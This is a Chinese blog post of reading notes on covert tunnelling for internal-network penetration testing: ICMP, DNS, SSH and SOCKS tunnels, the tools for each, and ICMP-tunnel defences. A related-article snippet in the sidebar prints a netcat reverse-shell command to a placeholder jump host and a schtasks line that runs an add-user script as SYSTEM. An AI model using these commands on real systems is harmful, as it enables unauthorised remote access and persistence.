内网安全攻防(三)

最新推荐文章于 2023-08-19 23:09:42 发布
最新推荐文章于 2023-08-19 23:09:42 发布
阅读量657 收藏 5
点赞数 1
分类专栏: 读书笔记 # 内网安全攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YUKIDDDD/article/details/119357684
版权

第3章 隐藏通信隧道技术

3.1 基础知识

隧道是一种绕过端口屏蔽的通信方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原的后的数据包发送到响应的服务器上。

常用的隧道举例:

  • 网络层:IPv6,ICMP,GRE
  • 传输层:TCP,UDP,常规端口转发
  • 应用层:SSH,HTTP,HTTPS,DNS

判断内网连通性

  1. ICMP协议:ping <IP地址或域名>
  2. TCP协议:nc <IP地址 端口号>
  3. HTTP协议:curl <IP地址:端口号>
  4. DNS协议:nslookupdig

3.2 网络层隧道技术

一、IPv6隧道
1.简介

通过IPv4隧道传送IPv6隧道数据报文。将IPv6报文整体封装到IPv4数据报文中,使IPv6报文能够穿过IPv4还用,到达IPv6小岛。

  • 当前的边界设备、防火墙甚至入侵防御系统还无法识别IPv6的通信数据
  • 即使设备支持IPv6,也可能无法正确分析封装了IPv6报文的IPv4数据包
  • 只有在执行隧道功能的节点的IPv6地址是IPv4兼容地址时,自动隧道才是可行的
  • 配置隧道方法则要求隧道末端节点使用其他机制来获得IPv4地址
  • 常用工具:socat,6tunnel,nt6tunnel

2.防御方法
了解IPv6的具体漏洞,结合其他协议,通过防火墙或其他防御系统过滤IPv6通信。

二、ICMP隧道

一般通信协议下,两台设备要进行通信,就需要开放端口,而ICMP协议则不需要。
将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙

常用工具

  • icmpsh
  • PingTunnel
  • icmptunnel
  • powershell icmp

防御方法

  • 检查同一来源的ICMP数据包的数量
  • 注意Payload大于64bit的ICMP数据包
  • 寻找响应数据包中的Payload与请求数据包中的Payload不一致的ICMP数据包
  • 检查ICMP数据包的协议标签

3.3 传输层隧道技术

一、端口转发

  • 内网端口转发
  • 本地端口映射

二、常用工具

  • lcx
  • netcat
  • PowerCat

3.4 应用层隧道技术

一、SSH协议

  • 本地转发
  • 远程转发
  • 动态转发

二、HTTP/HTTPS协议
三、DNS协议

  • 查看DNS连通性
  • dnscat2
  • iodine

3.5 SOCKS代理

SOCKS是一种代理服务,可以简单的将一端连接另一端。其标准端口为1080,SOCKS能够与目标内网计算机进行通信,避免多次使用端口转发
它在服务端监听一个端口,当有新的连接请求出现时,会先从SOCKS协议中解析出URL的目标端口,再执行lcx的具体功能

常用工具

  • EarthWorm
  • reGeorg
  • sSocks
  • Sockscap64
  • Proxifier
  • proxyChains

3.6 压缩数据

  • RAR
  • 7-Zip

3.7 上传和下载

  • FTP
  • VBS
  • Debug
  • Nishang
  • bitsadmin
  • PowserShell
YUKIDDDD
关注
专栏目录
2021-8-29《内网安全攻防》第一章内网基础知识
qq_45290991的博客
08-30 967
这是MS08067实验室的作品,我看的过程中做了一些笔记,算是复习+学习吧。 第一章、内网基础知识 工作组: 所有计算机对等,没有cs之分。相当于分小组,加入、创建工作组:右键“计算机”--->属性--->更改设置--->在“计算机名”的一栏中写入想好的名称,在“工作组”一栏中写入想要加入的工作组名称。退出工作组:同法改变工作组名称即可。 域:有安全边界的计算机集合。分为: 单域:一个域,一般一个域需要两个dc,因为一个dc坏了还能备份恢复回来 父域 域树,子域只能使用父..
局域网攻防安全
03-09
局域网是指在某一区域内由多台计算机互联成的计算机组,它 可以实现文件管理和共享等功能,一些攻击者常常会采用各种 不同的手段来攻击局域网,可能是炫耀技术,也可能是盗取信 息,无论什么目的,用户都要阻止她们的攻击,确保网络安全
内网-内网安全攻防-笔记.pdf
09-18
内网-内网安全攻防-笔记.pdf
内网安全攻防(一)
YUKIDDDD的博客
08-01 1087
第1章 内网基础知识1.1 内网基础知识 1.1 内网基础知识 内网也指局域网,是指在某一区域内由多台计算机互连而成的计算机组 工作组 将不同的计算机按功能进行分组就产生了工作组的概念。 计算机可以随意加入或退出工作组 工作组里所有计算机都是对等的 工作组中的计算机可以互相共享资源 域(Domain) 域是一个有安全边界的计算机集合 域的安全管理机制更加严格,用户要访问域内的资源,必须以合法的身份登录域 用户对域内的资源权限取决于用户身份 单域 在一个域内,一般要有至少两台域服务器,一台作为
内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
闵行小鱼塘
04-07 4990
本篇开始阅读学习《内网安全攻防:渗透测试实战指南》,做个笔记 本篇是第一章内网渗透测试基础,基本都是些基础概念和环境搭建
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南 内网安全攻防渗透测试实战指南是指在内网中进行的渗透测试实战指南,旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法。 内网安全攻防渗透测试实战指南主要包含...
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
内网安全攻防是网络安全领域中的重要组成部分,它涉及到企业、机构等组织内部网络的保护,防止未经授权的访问、攻击和信息泄露。本篇知识分享主要讲解了如何利用SSH隧道进行内网安全穿越,即内网安全攻防中的端口...
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享
08-21
内网安全攻防是网络安全领域中的重要组成部分,尤其是在企业或组织内部,内网安全直接影响到信息资产的安全。本文主要探讨了内网安全中一个特定的威胁——组策略首选项提权,并介绍了相关的防范措施。 首先,组策略...
内网安全攻防(二)
YUKIDDDD的博客
08-02 425
内网信息收集2.1 概述2.2 收集本机信息2.3 查询当前权限2.4 判断是否存在域2.5 探测域内存活主机2.6 扫描域内端口2.7 收集域内基础信息2.8 查找域控制器2.9 获取域内的用户和管理员信息2.10 定位域管理员2.11 查找域管理进程2.12 域管理员模拟方法简介2.13 利用PowserShell收集域信息2.14 域分析工具BloodHound2.15 敏感数据的防护2.16 分析域内网段划分情况及拓扑结构 2.1 概述 我是谁?——对当前机器角色的判断 这是哪?——对当前机器所处
内网ARP攻防教程
10-03
超详细讲解ARP攻防 首次上传文件 希望大家捧场 积分并不是太高
网络攻防内网安全横向渗透权限提升
weixin_46626737的博客
06-30 779
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
内网安全攻防》配套视频 之 安全域划分、域内权限解读
Ms08067安全实验室
09-15 478
前言《内网安全攻防 -渗透测试实战指南》出版已有八个月,相信,一定带领很多朋友入门了内网渗透,当然,也有不少读者反馈,看完还是懵懵懂懂,那怎么办?《内网安全攻防》图书出版的同时我们就给...
内网安全攻防:渗透测试实战指南》读书笔记(五):域内横向移动分析及防御
闵行小鱼塘
04-18 5468
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章系统的介绍了域内横向移动的主要方法,复现并剖析了内网域方面最重要、最经典的漏洞,同时给出了相应的防范方法
内网安全攻防(四)
YUKIDDDD的博客
08-04 595
第四章 权限提升分析及防御4.1 系统内核溢出漏洞提权分析及防范4.2 Windows操作系统配置错误4.3 组策略首选项提权分析及防范4.4 绕过UAC提权分析及防范4.5 令牌窃取分析及防范4.6 无凭证条件下的权限获取分析及防范 windows中权限大概分为四种: User:普通用户权限 Administrator:管理员权限(可利用Windows机制将自己提升为System权限) System:系统权限,可以对SAM等敏感文件进行读取 TrustedInstaller:Windows中的最高权限,
内网攻防——内网渗透测试基础
duan_qiao925的博客
07-06 371
1.1内网基础知识 1.1.1工作组 工作组可以看做是一个社团或者部门,比如将技术部的所有电脑放进技术部这个工作组,将销售部的所有电脑放进销售部这个工作组,组内的电脑之间可以方便的访问彼此的共享资源,可以自由进出工作组,组内的电脑之间彼此对等没有服务器和客户机之分。 更改工作组:此电脑–>属性–>高级设置–计算机设置–更改。如果输入的工作组不存在则会创建。 1.1.2域 域是一个有安全便捷的计算机集合,要想访问域内资源需要以合法的身份登录域,而且与用户在域内的身份有关。 域控制器:是域中一台类似
内网攻防学习Day1——常见的内网结构
最新发布
dzqxwzoe的博客
08-19 238
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。而实际上,因为域中的计算机是使用DNS来定位域控制器、服务器及其他计算机、网络服务的,所以域的名字就是DNS域的名字。每个域中都有独立的安全策略。首先要理解一下组的概念,在组里包含了很多用户,当管理员想要给某个用户分配权限时,只需要将用户加入到对应权限的组里就行,从而提高了管理效率,常见的组有:域本地组、全局组、通用组。
内网安全攻防》配套视频 之 利用PS查询域内信息
Ms08067安全实验室
11-09 148
内网安全攻防 -渗透测试实战指南》配套“知识星球”用于视频讲解和技术解答!星球截至目前已经完成以下全部73课视频为满足星球成员对于内网安全高级渗透技术的进一步需求,10月份我们和2个...
知识星球|"内网安全攻防星球"活动开幕...
Ms08067安全实验室
06-13 433
知识星球 618 活动已经正式上线,我们"内网安全攻防"星球也参与了此次活动!根据接到的通知,此次活动主打定金膨胀+豪礼回馈玩法。福利一:下定金,赢福利即日起至 6 月 ...
内网安全攻防:UAC提权分析与防范
内网安全攻防是信息安全领域的重要组成部分,特别是对于企业网络而言,内网往往包含了大量敏感信息,因此确保内网安全至关重要。本资料以2020年的一次知识分享为基础,探讨了内网中的攻防策略,特别是针对Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值